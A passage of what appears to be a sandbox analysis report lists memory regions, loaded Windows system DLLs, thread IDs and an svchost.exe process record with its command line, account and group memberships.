0x0 region_type = private name = "private_0x000000448bf40000" filename = "" Region: id = 2048 start_va = 0x448c040000 end_va = 0x448c13ffff entry_point = 0x0 region_type = private name = "private_0x000000448c040000" filename = "" Region: id = 2049 start_va = 0x448c140000 end_va = 0x448c1d2fff entry_point = 0x448c140000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 2050 start_va = 0x448c1e0000 end_va = 0x448c1e4fff entry_point = 0x448c1e0000 region_type = mapped_file name = "pcaevts.dll" filename = "\\Windows\\System32\\pcaevts.dll" (normalized: "c:\\windows\\system32\\pcaevts.dll") Region: id = 2051 start_va = 0x448c200000 end_va = 0x448c2fffff entry_point = 0x0 region_type = private name = "private_0x000000448c200000" filename = "" Region: id = 2052 start_va = 0x448c300000 end_va = 0x448c3fffff entry_point = 0x0 region_type = private name = "private_0x000000448c300000" filename = "" Region: id = 2053 start_va = 0x448c400000 end_va = 0x448c4fffff entry_point = 0x0 region_type = private name = "private_0x000000448c400000" filename = "" Region: id = 2054 start_va = 0x448c500000 end_va = 0x448c5fffff entry_point = 0x0 region_type = private name = "private_0x000000448c500000" filename = "" Region: id = 2055 start_va = 0x448c600000 end_va = 0x448c6fffff entry_point = 0x0 region_type = private name = "private_0x000000448c600000" filename = "" Region: id = 2056 start_va = 0x448c700000 end_va = 0x448c7fffff entry_point = 0x0 region_type = private name = "private_0x000000448c700000" filename = "" Region: id = 2057 start_va = 0x448c800000 end_va = 0x448c8fffff entry_point = 0x0 region_type = private name = "private_0x000000448c800000" filename = "" Region: id = 2058 start_va = 0x448c900000 end_va = 0x448c9fffff entry_point = 0x0 region_type = private name = "private_0x000000448c900000" filename = "" Region: id = 2059 start_va = 0x448ca00000 end_va = 0x448cafffff entry_point = 0x0 region_type = private name = "private_0x000000448ca00000" filename = "" Region: id = 2060 start_va = 0x448cb00000 end_va = 0x448cb7ffff entry_point = 0x0 region_type = private name = "private_0x000000448cb00000" filename = "" Region: id = 2061 start_va = 0x448cb80000 end_va = 0x448cbeffff entry_point = 0x448cb80000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 2062 start_va = 0x448cc00000 end_va = 0x448ccfffff entry_point = 0x0 region_type = private name = "private_0x000000448cc00000" filename = "" Region: id = 2063 start_va = 0x448cd00000 end_va = 0x448cdfffff entry_point = 0x0 region_type = private name = "private_0x000000448cd00000" filename = "" Region: id = 2064 start_va = 0x448ce00000 end_va = 0x448ce7ffff entry_point = 0x0 region_type = private name = "private_0x000000448ce00000" filename = "" Region: id = 2065 start_va = 0x448ce80000 end_va = 0x448cf7ffff entry_point = 0x0 region_type = private name = "private_0x000000448ce80000" filename = "" Region: id = 2066 start_va = 0x448d080000 end_va = 0x448d17ffff entry_point = 0x0 region_type = private name = "private_0x000000448d080000" filename = "" Region: id = 2067 start_va = 0x448d200000 end_va = 0x448d2fffff entry_point = 0x0 region_type = private name = "private_0x000000448d200000" filename = "" Region: id = 2068 start_va = 0x448d300000 end_va = 0x448d3fffff entry_point = 0x0 region_type = private name = "private_0x000000448d300000" filename = "" Region: id = 2069 start_va = 0x448d400000 end_va = 0x448d4fffff entry_point = 0x0 region_type = private name = "private_0x000000448d400000" filename = "" Region: id = 2070 start_va = 0x448d500000 end_va = 0x448d5fffff entry_point = 0x0 region_type = private name = "private_0x000000448d500000" filename = "" Region: id = 2071 start_va = 0x448d600000 end_va = 0x448d6fffff entry_point = 0x0 region_type = private name = "private_0x000000448d600000" filename = "" Region: id = 2072 start_va = 0x7df5ffc10000 end_va = 0x7ff5ffc0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc10000" filename = "" Region: id = 2073 start_va = 0x7ff6e0776000 end_va = 0x7ff6e0777fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0776000" filename = "" Region: id = 2074 start_va = 0x7ff6e0778000 end_va = 0x7ff6e0779fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0778000" filename = "" Region: id = 2075 start_va = 0x7ff6e077c000 end_va = 0x7ff6e077dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e077c000" filename = "" Region: id = 2076 start_va = 0x7ff6e077e000 end_va = 0x7ff6e077ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e077e000" filename = "" Region: id = 2077 start_va = 0x7ff6e0780000 end_va = 0x7ff6e0781fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0780000" filename = "" Region: id = 2078 start_va = 0x7ff6e0782000 end_va = 0x7ff6e0783fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0782000" filename = "" Region: id = 2079 start_va = 0x7ff6e0784000 end_va = 0x7ff6e0785fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0784000" filename = "" Region: id = 2080 start_va = 0x7ff6e0786000 end_va = 0x7ff6e0787fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0786000" filename = "" Region: id = 2081 start_va = 0x7ff6e0788000 end_va = 0x7ff6e0789fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0788000" filename = "" Region: id = 2082 start_va = 0x7ff6e078a000 end_va = 0x7ff6e078bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e078a000" filename = "" Region: id = 2083 start_va = 0x7ff6e078c000 end_va = 0x7ff6e078dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e078c000" filename = "" Region: id = 2084 start_va = 0x7ff6e078e000 end_va = 0x7ff6e078ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e078e000" filename = "" Region: id = 2085 start_va = 0x7ff6e0790000 end_va = 0x7ff6e0791fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0790000" filename = "" Region: id = 2086 start_va = 0x7ff6e0792000 end_va = 0x7ff6e0793fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0792000" filename = "" Region: id = 2087 start_va = 0x7ff6e0794000 end_va = 0x7ff6e0795fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0794000" filename = "" Region: id = 2088 start_va = 0x7ff6e0796000 end_va = 0x7ff6e0797fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0796000" filename = "" Region: id = 2089 start_va = 0x7ff6e0798000 end_va = 0x7ff6e0799fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0798000" filename = "" Region: id = 2090 start_va = 0x7ff6e079a000 end_va = 0x7ff6e079bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e079a000" filename = "" Region: id = 2091 start_va = 0x7ff6e079c000 end_va = 0x7ff6e079dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e079c000" filename = "" Region: id = 2092 start_va = 0x7ff6e079e000 end_va = 0x7ff6e079ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e079e000" filename = "" Region: id = 2093 start_va = 0x7ff6e07a0000 end_va = 0x7ff6e089ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e07a0000" filename = "" Region: id = 2094 start_va = 0x7ff6e08a0000 end_va = 0x7ff6e08c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e08a0000" filename = "" Region: id = 2095 start_va = 0x7ff6e08c4000 end_va = 0x7ff6e08c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08c4000" filename = "" Region: id = 2096 start_va = 0x7ff6e08c6000 end_va = 0x7ff6e08c7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08c6000" filename = "" Region: id = 2097 start_va = 0x7ff6e08c8000 end_va = 0x7ff6e08c8fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08c8000" filename = "" Region: id = 2098 start_va = 0x7ff6e08ca000 end_va = 0x7ff6e08cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08ca000" filename = "" Region: id = 2099 start_va = 0x7ff6e08cc000 end_va = 0x7ff6e08cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08cc000" filename = "" Region: id = 2100 start_va = 0x7ff6e08ce000 end_va = 0x7ff6e08cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e08ce000" filename = "" Region: id = 2101 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2102 start_va = 0x7ffc3ec50000 end_va = 0x7ffc3edd9fff entry_point = 0x7ffc3ec50000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2103 start_va = 0x7ffc3f050000 end_va = 0x7ffc3f07ffff entry_point = 0x7ffc3f050000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 2104 start_va = 0x7ffc41b00000 end_va = 0x7ffc41b84fff entry_point = 0x7ffc41b00000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2105 start_va = 0x7ffc46700000 end_va = 0x7ffc46742fff entry_point = 0x7ffc46700000 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 2106 start_va = 0x7ffc496f0000 end_va = 0x7ffc49703fff entry_point = 0x7ffc496f0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2107 start_va = 0x7ffc49710000 end_va = 0x7ffc49807fff entry_point = 0x7ffc49710000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2108 start_va = 0x7ffc4a370000 end_va = 0x7ffc4a380fff entry_point = 0x7ffc4a370000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2109 start_va = 0x7ffc4d910000 end_va = 0x7ffc4d98efff entry_point = 0x7ffc4d910000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2110 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2111 start_va = 0x7ffc50920000 end_va = 0x7ffc50967fff entry_point = 0x7ffc50920000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2112 start_va = 0x7ffc50a40000 end_va = 0x7ffc50a4dfff entry_point = 0x7ffc50a40000 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 2113 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2114 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2115 start_va = 0x7ffc50a90000 end_va = 0x7ffc50ac5fff entry_point = 0x7ffc50a90000 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 2116 start_va = 0x7ffc50ad0000 end_va = 0x7ffc50b67fff entry_point = 0x7ffc50ad0000 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 2117 start_va = 0x7ffc50b70000 end_va = 0x7ffc50bccfff entry_point = 0x7ffc50b70000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2118 start_va = 0x7ffc50c00000 end_va = 0x7ffc50d30fff entry_point = 0x7ffc50c00000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2119 start_va = 0x7ffc50d80000 end_va = 0x7ffc50d8afff entry_point = 0x7ffc50d80000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2120 start_va = 0x7ffc50d90000 end_va = 0x7ffc50d97fff entry_point = 0x7ffc50d90000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 2121 start_va = 0x7ffc50da0000 end_va = 0x7ffc50eb0fff entry_point = 0x7ffc50da0000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2122 start_va = 0x7ffc511b0000 end_va = 0x7ffc51332fff entry_point = 0x7ffc511b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2123 start_va = 0x7ffc51340000 end_va = 0x7ffc513b1fff entry_point = 0x7ffc51340000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2124 start_va = 0x7ffc51570000 end_va = 0x7ffc51580fff entry_point = 0x7ffc51570000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2125 start_va = 0x7ffc51a80000 end_va = 0x7ffc51c2afff entry_point = 0x7ffc51a80000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2126 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2127 start_va = 0x7ffc51c40000 end_va = 0x7ffc51c48fff entry_point = 0x7ffc51c40000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2128 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2129 start_va = 0x7ffc51c90000 end_va = 0x7ffc51c99fff entry_point = 0x7ffc51c90000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2130 start_va = 0x7ffc51cb0000 end_va = 0x7ffc51cc7fff entry_point = 0x7ffc51cb0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2131 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2132 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2133 start_va = 0x7ffc532b0000 end_va = 0x7ffc532e1fff entry_point = 0x7ffc532b0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2134 start_va = 0x7ffc532f0000 end_va = 0x7ffc53371fff entry_point = 0x7ffc532f0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2135 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2136 start_va = 0x7ffc535d0000 end_va = 0x7ffc535dbfff entry_point = 0x7ffc535d0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2137 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2138 start_va = 0x7ffc53830000 end_va = 0x7ffc5383bfff entry_point = 0x7ffc53830000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2139 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2140 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2141 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2142 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2143 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2144 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2145 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2146 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2147 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2148 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2149 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2150 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2151 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2152 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2153 start_va = 0x7ffc54ca0000 end_va = 0x7ffc54cf3fff entry_point = 0x7ffc54ca0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2154 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2155 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2156 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2157 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2158 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2159 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2160 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2161 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2162 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2163 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2164 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2165 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2166 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2167 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2168 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2169 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3407 start_va = 0x7ffc514b0000 end_va = 0x7ffc514c5fff entry_point = 0x7ffc514b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Thread: id = 247 os_tid = 0xc54 Thread: id = 248 os_tid = 0xc34 Thread: id = 249 os_tid = 0x200 Thread: id = 250 os_tid = 0xfc4 Thread: id = 251 os_tid = 0xe18 Thread: id = 252 os_tid = 0xe14 Thread: id = 253 os_tid = 0x870 Thread: id = 254 os_tid = 0xb84 Thread: id = 255 os_tid = 0xaf4 Thread: id = 256 os_tid = 0xa3c Thread: id = 257 os_tid = 0x740 Thread: id = 258 os_tid = 0x2fc Thread: id = 259 os_tid = 0x2c4 Thread: id = 260 os_tid = 0x2b0 Thread: id = 261 os_tid = 0x8 Thread: id = 262 os_tid = 0x134 Thread: id = 263 os_tid = 0x230 Thread: id = 264 os_tid = 0x120 Thread: id = 265 os_tid = 0x3d4 Thread: id = 266 os_tid = 0x3b4 Thread: id = 267 os_tid = 0x3b0 Thread: id = 268 os_tid = 0x3ac Thread: id = 269 os_tid = 0x394 Thread: id = 270 os_tid = 0x38c Thread: id = 271 os_tid = 0x330 Thread: id = 464 os_tid = 0xdb8 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3c663000" os_pid = "0x358" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BthHFSrv" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TimeBroker" [0xe], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e325" [0xc000000f], "LOCAL" [0x7] Region: id = 1910 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1911 start_va = 0x1518a60000 end_va = 0x1518a6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001518a60000" filename = "" Region: id = 1912 start_va = 0x1518a70000 end_va = 0x1518a70fff entry_point = 0x1518a70000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1913 start_va = 0x1518a80000 end_va = 0x1518a93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001518a80000" filename = "" Region: id = 1914 start_va = 0x1518aa0000 end_va = 0x1518b1ffff entry_point = 0x0 region_type = private name = "private_0x0000001518aa0000" filename = "" Region: id = 1915 start_va = 0x1518b20000 end_va = 0x1518b23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001518b20000" filename = "" Region: id = 1916 start_va = 0x1518b30000 end_va = 0x1518b30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001518b30000" filename = "" Region: id = 1917 start_va = 0x1518b40000 end_va = 0x1518b41fff entry_point = 0x0 region_type = private name = "private_0x0000001518b40000" filename = "" Region: id = 1918 start_va = 0x1518b50000 end_va = 0x1518c0dfff entry_point = 0x1518b50000 region_type = mapped_file name = 